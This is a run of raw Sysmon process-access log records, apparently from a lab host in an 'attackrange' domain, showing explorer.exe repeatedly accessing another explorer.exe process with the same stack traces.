16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 